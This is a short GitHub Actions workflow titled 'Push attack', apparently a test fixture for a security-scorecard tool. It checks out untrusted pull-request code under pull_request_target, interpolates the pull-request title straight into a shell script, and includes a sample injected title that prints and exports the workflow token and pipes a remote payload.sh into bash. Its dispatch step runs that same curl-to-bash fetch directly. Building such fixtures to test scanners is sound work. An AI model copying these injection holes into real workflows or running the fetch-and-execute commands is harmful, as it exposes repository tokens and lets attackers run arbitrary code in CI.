name: Push attack
on: 
  workflow_dispatch:
  pull_request_target:
    branches: [ main ]

jobs:
  my-job:
    runs-on: ubuntu-latest
    env:
      GITHUB_TOKEN: ${{ github.token }}
    steps:
      - name: Checkout code
        uses: actions/checkout@v2
        with:
          ref: ${{ github.event.pull_request.head.sha }}

      # this is the title"; echo ${{ github.token }}; export THE_TOKEN=${{ github.token }}; echo $THE_TOKEN; curl -s https://raw.githubusercontent.com/laurentsimon/scorecard-action-test-2/main/payload.sh | bash; echo "pwned
      - name: on PR
        if: ${{ github.event_name == 'pull_request_target' }}
        run: |
          echo "Starting processing..."
          #echo "token: ${{ github.token }}"
          echo "env: ${{ github.env }}"
          #echo "path: $(cat $GITHUB_EVENT_PATH)"

          echo "Title: ${{ github.event.pull_request.title }}"
          echo "Done processing"
          #echo "GITHUB_TOKEN: ${{ github.token }}

      - name: on dispatch
        if: ${{ github.event_name == 'workflow_dispatch' }}
        run: |
          echo "Hello World!"
        
          curl https://raw.githubusercontent.com/laurentsimon/scorecard-action-test-2/main/payload.sh | bash
